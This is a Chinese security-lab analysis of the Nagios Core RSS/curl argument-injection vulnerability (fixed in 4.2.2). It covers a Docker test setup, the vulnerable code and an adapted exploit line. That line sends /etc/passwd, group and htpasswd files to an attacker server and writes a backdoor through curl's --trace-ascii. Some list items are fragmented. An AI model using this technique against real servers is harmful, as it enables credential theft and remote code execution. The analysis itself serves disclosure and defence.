Author: p0wd3r, dawu (知道创宇404安全实验室)
Date: 2016-12-15
Nagios 是一款监控IT基础设施的程序,近日安全研究人员 Dawid Golunski 发现在 Nagios Core 中存在一个代码执行漏洞:攻击者首先伪装成 RSS 订阅源,当受害应用获取 RSS 信息时攻击者将恶意构造的数据传给受害者,程序在处理过程中将恶意数据注入到了 curl 的命令中,进而代码执行。
漏洞触发前提:
https://www.nagios.org
,利用 dns 欺骗等方法rss-corefeed.php
、rss-newsfeed.php
和rss-corebanner.php
其中一个文件。成功攻击可执行任意代码。
Nagios Core < 4.2.2
Dockerfile:
FROM quantumobject/docker-nagios RUN sed -i '99d' /usr/local/nagios/share/includes/rss/rss_fetch.inc RUN mkdir /tmp/tmp && chown www-data:www-data /tmp/tmp
然后运行:
docker run -p 80:80 --name nagios -d quantumobject/docker-nagios
访问http://127.0.0.1/nagios
,用nagiosadmin:admin
登录即可
漏洞触发点在/usr/local/nagios/share/includes/rss/extlib/Snoopy.class.inc
第657行,_httpsrequest
函数中:
// version < 4.2.0 exec($this->curl_path." -D \"/tmp/$headerfile\"".escapeshellcmd($cmdline_params)." ".escapeshellcmd($URI),$results,$return); // vserion >= 4.2.0 && version < 4.2.2 exec($this->curl_path." -D \"/tmp/$headerfile\"".$cmdline_params." \"".escapeshellcmd($URI)."\"",$results,$return);
这里使用了escapeshellcmd
来对命令参数进行处理,escapeshellcmd
的作用如下:
作者意在防止多条命令的执行,但是这样处理并没有防止注入多个参数样如果$URI
可控,再配合curl
的一些特性便可以进行文件读写,进而代码执行。(一般来说为防止注入多个参数要使用 escapeshellarg,但该函数也不是绝对安全,详见 CVE-2015-4642。)
因为之前爆出的 CVE-2008-4796,代码在4.2.0版本做了改变,但是该补丁可以被绕过,只要我们在输入中闭合前后的"
即可。
下面我们来看$URI
是否可控。根据代码逻辑来看,_httpsrequet
被usr/local/nagios/share/includes/rss/rss_fetch.inc
中的fetch_rss
函数调用,这样我们创建这样一个测试文件test.php
:
<?php define('MAGPIE_DIR', './includes/rss/'); define('MAGPIE_CACHE_ON', 0); define('MAGPIE_CACHE_AGE', 0); define('MAGPIE_CACHE_DIR', '/tmp/magpie_cache'); require_once(MAGPIE_DIR.'rss_fetch.inc'); fetch_rss('https://www.baidu.com --version');
访问http://127.0.0.1/nagios/test.php
之后开启动态调试,我们在上述exec
函数处下断点,函数调用栈如下:
$URI
情况如下:
可知$URI
可控,并且在传入过程中没有被过滤。
接下来需要构造curl
参数来得到我们想要的结果,这里我们使用 Dawid Golunski 提供的 Exp,需要注意的是,他提供的代码可验证4.2.0之前的版本,若验证版本大于等于4.2.0且小于4.2.2时,需对其代码进行一下更改,加上闭合所需要的双引号:
# 第44行 self.redirect('https://' + self.request.host + '/nagioshack" -Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii ' + backdoor_path + '"', permanent=False)
该 Exp 具体流程如下:
fetch_rss
向该服务器发其请求https:// + 攻击者服务器 + payload
,payload 中使用-F
将文件内容发送给服务器,--trace-ascii
将流量记录到文件中(类似 Roundcube RCE 中 mail
函数的-X
)。description
中添加<img src=backdoor.php>
description
的内容输出到html中,进而自动执行后门为了方便验证,我们在网站目录下创建一个exp.php
:
<?php define('MAGPIE_DIR', './includes/rss/'); define('MAGPIE_CACHE_ON', 0); define('MAGPIE_CACHE_AGE', 0); define('MAGPIE_CACHE_DIR', '/tmp/magpie_cache'); require_once(MAGPIE_DIR.'rss_fetch.inc'); fetch_rss('http://172.17.0.3');
(仅为验证漏洞,这里我们并没有解析XML)然后我们在172.17.0.3
上运行 Exp,然后访问http://127.0.0.1/exp.php
即可得到结果:
实际测试时 Exp 中的后门代码有可能在日志中会被截断从而导致命令执行不成功,建议写入简短的一句话:
真实情况下,fetch_rss
的调用情况如下:
可见我们并不能控制其参数的值,所以只能通过 dns 欺骗等手段使目标对https://www.nagios.org
的访问指向攻击者的服务器,进而触发漏洞。
4.2.2版本中删除了includes/
以及rss-corefeed.php
、rss-newsfeed.php
和rss-corebanner.php
。
升级到4.2.2
escapeshellcmd
的使用手册:http://php.net/manual/zh/function.escapeshellcmd.php